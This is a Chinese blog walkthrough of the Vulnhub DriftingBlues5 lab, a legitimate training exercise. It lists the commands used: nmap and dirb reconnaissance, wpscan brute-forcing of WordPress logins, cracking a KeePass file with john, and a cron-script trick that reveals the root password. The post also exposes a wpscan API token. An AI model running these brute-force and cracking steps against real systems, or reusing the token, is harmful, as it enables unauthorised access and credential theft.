【靶场系列】driftingblues5

最新推荐文章于 2024-05-29 12:41:29 发布
最新推荐文章于 2024-05-29 12:41:29 发布
阅读量282 收藏 8
点赞数 3
分类专栏: 靶场系列 文章标签: php 安全 安全威胁分析 网络安全 系统安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41169485/article/details/137956669
版权

信息收集

nmap发现主机

nmap 192.168.56.0/24

Nmap scan report for 192.168.56.131
Host is up (0.0031s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

dirb扫描目录

dirb http://192.168.56.131/

发现worldpress登录页面
http://192.168.56.131/wp-login.php

有目录遍历
http://192.168.56.131/wp-includes/
http://192.168.56.131/wp-admin/includes/
http://192.168.56.131/wp-admin/images/
http://192.168.56.131/wp-content/uploads/
...

爆用户

wpscan --url http://192.168.56.131/ -e u

image.png

爆密码,爆不出来

wpscan --url http://192.168.56.131/ -U ~/u.txt -P /usr/share/wordlists/rockyou.txt -t 50

扫漏洞,没有合适的漏洞

wpscan --url http://192.168.56.131/ --api-token H3WNWY5YnLBhWcQtyQ2cP6IyVOhWiwAIsJH7F1WxBfc -e vp,vt,tt

根据目录生成字典

cewl -m 5 -w pass.txt 192.168.56.131

再次爆破用户密码

wpscan --url http://192.168.56.131/ -U ../u.txt -P pass.txt

Pasted image 20240416151206
成功登录,但用户权限低
Pasted image 20240416151416

看了WP才知道http://192.168.56.131/wp-content/uploads/2021/02/dblogo.png图片有隐写ssh密码
image.png

获取shell

经过逐一测试,该密码是gill用户的密码,登录ssh

ssh gill@192.168.56.131

权限提升

查看系统版本,按版本查找漏洞

uname -a

Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux

没有内核提权漏洞

searchsploit -s 'debian 4.19'

Exploits: No Results
Shellcodes: No Results

上传执行linpeas.sh脚本,发现keyfolder目录
工具地址:https://linpeas.sh
image.png

上传执行pspy脚本,监控定时任务,发现key.sh每分钟都在执行

scp ./Desktop/pspy64 gill@192.168.56.131:/home/gill

工具地址:https://github.com/DominicBreuker/pspy
image.png

下载用户目录下的keyfile.kdbx文件,这是一个储存密钥的文件,同时自身也有密码

scp gill@192.168.56.131:/home/gill/keyfile.kdbx ./

hash爆破文件密码

keepass2john keyfile.kdbx > keyhash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt keyhash.txt

Pasted image 20240416153118
用在线网站https://app.keeweb.info导入文件并输入密码打开
Pasted image 20240416153303
这些并不是root密码
查看wp后,才知道要在/keyfolder目录下创建以下名称的目录或文件

2real4surreal
buddyretard
closet313
exalted
fracturedocean
zakkwylde


mkdir fracturedocean 或 touch fracturedocean

创建名为fracturedocean的目录后,keyfolder文件夹内多出了rootcreds.txt文件
查看文件内容,发现是root密码

root creds

imjustdrifting31

有了root权限后,查看key.sh文件内容

#!/bin/bash

if [[ $(ls /keyfolder) == "fracturedocean" ]]; then
        echo "root creds" >> /keyfolder/rootcreds.txt
        echo "" >> /keyfolder/rootcreds.txt
        echo "imjustdrifting31" >> /keyfolder/rootcreds.txt
fi
中原第一高手
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulntarget靶场系列.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
靶场系列之DC-1.md
07-26
靶场系列之DC-1.md
靶场系列driftingblues
qq_41169485的博客
04-19 298
爆破域名,所以就跳过这一步直接得到test.driftingblues.box了。该脚本会用root权限执行/tmp/emergency程序,但该系统里并没有该程序。编辑/tmp/emergency实现更改root密码,并赋予执行权限。将test.driftingblues.box写入hosts文件。查看首页源代码,在最下方发现一段base64编码。尝试爆破在主页发现的一个用户eric,成功。等待定时任务执行,可以看到任务执行成功了。猜测需要域名访问,首先要知道靶机的域名。
靶场系列driftingblues2
qq_41169485的博客
04-19 414
登录后台,发现hello.php是可以编辑的,遂写入一句话木马。发现普通用户freddie用户开启了ssh登录,且私钥是可读的。nc反弹shell,注意payload需要url编码。下载linpeas.sh脚本,赋予执行权限并执行。访问hello.php,成功执行phpinfo。在kali上写入私钥文件,并设置为权限为600。使用wpscan扫描器扫描,先爆出用户。将压缩包保存到web服务器下,靶机下载。将域名写入hosts即可正常访问。访问80端口,发现使用域名。执行exp获取root权限。
靶场系列driftingblues6
qq_41169485的博客
04-22 399
robots.txt文件提示不要忘了扫描zip文件,可能是备份文件泄露。发现一处文件上传,经查该cms有任意文件上传,尝试上传一句话木马成功。上传linpeas.sh脚本执行,得到建议利用的系统历史漏洞。直接使用CVE-2016-5195脏牛提权漏洞。网上查询到该cms的文件上传目录,直接访问。使用密码打开压缩包,这段文本类似账号密码。在管理界面可以把界面语言改成简体中文。使用python获取交互式shell。会下载spammer.zip压缩包。压缩包被加密了,尝试爆破。发现登录界面和安装界面。
靶场系列driftingblues7
qq_41169485的博客
04-23 278
扫到一个.bash_history文件,下载查看,根据历史命令推测该目录下还存在一个eon文件。访问80端口,自动跳转到443端口,该cms是eyesofnetwork。根据查找到的EyesOfNetwork漏洞,选了一个可以rce的开始利用。使用john爆破zip密码,得到压缩包密码为killah。推测该账号密码是443端口的web页面登录密码,成功登录。搜索该cms的漏洞,可以看到该cms有很多漏洞。解码可知该文件是zip文件,因为有PK头。解码得到压缩包,但是需要密码才能打开。
靶场系列driftingblues9
qq_41169485的博客
04-25 333
保存脚本到web服务器下,让靶机下载,注意要让input文件和input.py在同一目录下。这个用户和执行exp后得到的数据库用户账号和密码一样,猜测两者的密码也一样,遂登录。查看/etc/passwd文件,发现有个clapton用户。用户目录下有note.txt和input程序。查看note.txt文档,文中提到缓冲区溢出。目录没有写的权限,所以先赋予权限。从大佬的wp扒下来提权脚本。nmap扫描获取主机ip。运行脚本获取root权限。获取交互式shell。
靶场系列driftingblues8
qq_41169485的博客
04-24 248
登录clapton账号看到根目录下有多个文件,还有wordlist.txt字典,可能是想让我们用这个字典爆破。复制下来用john爆破,得到clapton用户的密码,但是root的密码爆不出来。看到登录页面是openemr,随在kali中查找该cms的漏洞。爆破目录,基本上的都是目录遍历,不过都没什么用就是了。写有用户secure的账号和密码,但是只能本地登录。扫到wordlist.txt文件,是个字典。保存字典,使用john爆破出root密码。尝试4.1.1版本的漏洞,利用不成功。nc反弹shell成功。
靶场系列driftingblues4
qq_41169485的博客
04-20 363
从用户UID 1001不难看出这是一个用户home目录,我们对此目录具有777的权限,再加上ssh只能通过密钥登录,所以我们把可以上传公钥然后登录此用户。忽然想到,ftp服务的hubert目录和用户的目录不一致,find搜索发现该ftp根目录在另一目录。同时,根据系统定时任务,猜测该ftp目录内的文件会定时同步到hubert的home目录。这里得到几个用户名,猜测是ftp爆破,因为ssh不允许密码登录。在网页首页的源码里发现了一段base64,解码得到一个文件名。nmap扫描存活主机。
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-6
Aluxian_的博客
03-20 1969
Vulnhub靶机driftingblues6_vh渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机漏洞详解:①:信息收集:②:开始目录爆破:③:暴力破解zip:③:上传WebShell:④:脏牛提权:⑤:获取flag:Vulnhub靶机渗透总结: Vulnhub靶机介绍: Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/driftingblues-6,672/ Vulnhub靶机漏洞详解: ①:信息收集: kali里使用net
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-9
Aluxian_的博客
07-01 930
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-9-final,695/ 下载好了把安装包解压 然后试用VMware即可。kali里使用发现主机 渗透机:kali IP :192.16
vuInhub靶场实战系列-DC-5实战
05-27
vuInhub靶场实战系列-DC-5实战
webgoat靶场需要自行搭建
01-19
webgoat靶场需要自行搭建
php之md5类型靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
linux 阿里云服务器安装ImageMagick和php扩展imagick
qq_54039576的博客
05-27 323
我的服务器默认是php.7.4.3 , 改完php -m 是找不到imagick的,实际上没对应php版本解锁,Alibaba Cloud Linux 3.2104 LTS 64位。就所有php.ini全改一遍, 再重启一遍apache和数据库。#寻找所有php.ini文件。
源码编译安装LAMP(安装apeche mysql php 论坛 网站 巨详细版)
F12138X的博客
05-26 1328
仰天大笑出门去,我辈岂是蓬蒿人
如何使用宝塔面板搭建Tipask问答社区网站并发布公网远程访问
最新发布
深入解析C/C++编程技巧,带你探索高效开发之路
05-29 623
我们的生活和工作中,碰到问题的时候通常都会到网上寻找答案,但网上寻找到的答案要么答非所问,要么全是广告,真正有价值的回答少之又少,这就让人很头疼。也正是这个痛点,催生了如“某乎”这样的问答平台,让我们能轻松快速的找到想要的答案。本文主要跟大家介绍,如何使用Cpolar+Tipask,在Ubuntu系统上搭建一个私人问答网站并实现随时随地远程访问本地站点,无需公网ip也不用购买域名服务器。Tipask网站从基本上看,实际与论坛网站很相似,因此在安装和部署上并没有太大的难度。
HackTheBox-Machines--Popcorn
七天
05-28 463
Popcorn 测试过程。
vulfocus靶场
07-28
vulfocus靶场是一个漏洞集成平台,可以通过在服务器中安装docker来使用。你可以使用以下命令将vulfocus镜像拉取到本地:docker pull vulfocus/vulfocus:latest。搭建vulfocus靶场可以按需搭建在本地或自己的服务器上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值